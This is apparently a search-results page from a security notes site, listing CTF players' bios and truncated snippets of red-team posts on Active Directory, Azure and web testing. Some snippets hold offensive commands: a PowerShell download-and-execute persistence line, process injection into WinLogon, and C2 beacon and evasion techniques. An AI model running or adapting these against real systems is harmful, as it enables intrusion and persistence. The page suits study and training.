Search Results

Passion for Red Team/Pentesting and machine learning. Software Ing. HackTheBox: BobBuilder

I like otters... a lot ʕ •ᴥ•ʔ Currently focusing on honing my AD skills and recently got into AV/EDR evasion Find me on HackTheBox here and on VulnLab :)

I love cats, Active Directory and playing CTFs

Kerberoasting Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. We need a valid domain user account and password. Vulnera...

User SID and RID In Active Directory, any group or user that Windows doesn't create has a RID of 1000 or greater. The last 8 bytes of RID determines the user's group. RID : 0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000 SID : 0x01050000000000051500...

Find hash type based on length Get example hashes that has length of 80 $hashes=(.\hashcat64.exe --example-hashes | where {$_.split('HASH: ')[-1].length -like 80}) Get crack type from example hashes with length 80 hashcat64.exe --example-hashes |Select-String...

Database enumeration MySQL SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata; SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables; SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users...

Persistence on Windows The commands that include execute-assembly have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Task scheduler $str = 'IEX ((new-object net.webclient).downloadstring("http:...

Windows recon Some commands are meant to be executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Applocker Applocker policies Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Powersh...

SeDebugPrivilege Migrate PID to privileged process such as WinLogon using ProcessInjection to load adopt. WinLogon PID: 3488 Adopt binary: adopt.exe PS /bob> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\ado...

Interested in everything to do with enterprise network security. Usually big fan of web and pwn too, but not very active lately.

Passionate about cybersecurity, specializing in Active Directory environments. CTF Player focused on Web, Forensics and Blockchain. You'll find me on platforms like HackTheBox and VulnLab!

Defense Evasion Useful Links Win32 API docs NTAPI Undocumented Functions Kernel-specific structures (pick the right kernel version / update) DLL download for Unhooking (download URL structure is https://msdl.microsoft.com/download/symbols/name.dll/{IMAG...

Definition Server-Side Request Forgery (SSRF) is a vulnerability that allows attackers to manipulate a server into making requests to internal or external resources, potentially gaining access to data and systems not directly reachable by the attacker. Bypass ...

Always apply the best nmap scanning strategy for all size networks Scan Network Range  nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5  nmap -sn -oA tnet -iL hosts.lst | grep for | cut -d" " -f5  nmap -sn -oA tnet 10.129.2.18 10.129.2.19 10.129.2.20...

Hey there! I'm interested in cybersecurity and I play CTFs as a hobby. My biggest interests are in reverse engineering and forensics. You can find me on CTF Discord servers (fsharp123), GitHub (G-flat), and Twitter (currently known as X; fsharp123). Personal a...

dirkjanm.io Blog AADInternals Blog List of Managed Identities Web applications Portal.azure.com admin.exchange.microsoft.com compliance.microsoft.com security.microsoft.com Graph Explorer Graph PWSH SDK Documentation MSOnline PWSH Module docume...

AAD (Azure Active Directory) is an identity and access management service: it allows users and applications to access resources like VMs, storage accounts or the M365 suite. All resources are maintained inside a Tenant which represent a company (like a domain ...

MS has a series of public APIs and DNS public suffixes that we can check during the enumeration phase. Enumerating with Public APIs These APIs can be used to find information about domain names, whether the domain is federated or not, if a specific user exists...

Enumerate AD tenant information admin roles and identify high-value targets in the network ADFS Resources Conditional access policies UAL (Unified Access Log) settings Service principal accounts (for single-factor logon) Storage accounts / key vaults To perf...